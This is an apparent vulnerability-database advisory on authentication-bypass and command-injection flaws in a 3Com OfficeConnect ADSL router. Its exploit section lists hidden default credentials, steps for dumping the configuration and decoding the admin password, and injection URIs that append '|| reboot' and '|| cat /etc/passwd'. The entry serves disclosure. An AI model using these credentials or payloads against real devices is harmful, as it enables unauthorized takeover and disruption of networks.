ID
VAR-E-200910-0398
TITLE
3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Trust: 0.3
DESCRIPTION
3Com OfficeConnect ADSL Wireless 11g Firewall Router is prone to an authentication-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to gain unauthorized administrative access to the affected device or execute arbitrary commands. Successful exploits will completely compromise the device.
Trust: 0.3
AFFECTED PRODUCTS
vendor: | 3com | model: | officeconnect adsl wireless 11g firewall router | scope: | eq | version: | 3.0 | Trust: 0.3 |
EXPLOIT
Attackers can use readily available tools to exploit these issues.
These example URIs and proof of concept demonstrate the issues:
1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
4) Type 3 to dump the configuration
5) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
6) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty
http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
Andrea Fabrizi
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 36722 | Trust: 0.3 |
REFERENCES
url: | http://www.3com.com/products/en_us/detail.jsp?tab=features&sku=3crwe754g72-a&pathtype=purchase | Trust: 0.3 |
SOURCES
db: | BID | id: | 36722 |
LAST UPDATE DATE
2022-07-27T09:59:29.044000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 36722 | date: | 2009-10-19T19:18:00 |
SOURCES RELEASE DATE
db: | BID | id: | 36722 | date: | 2009-10-19T00:00:00 |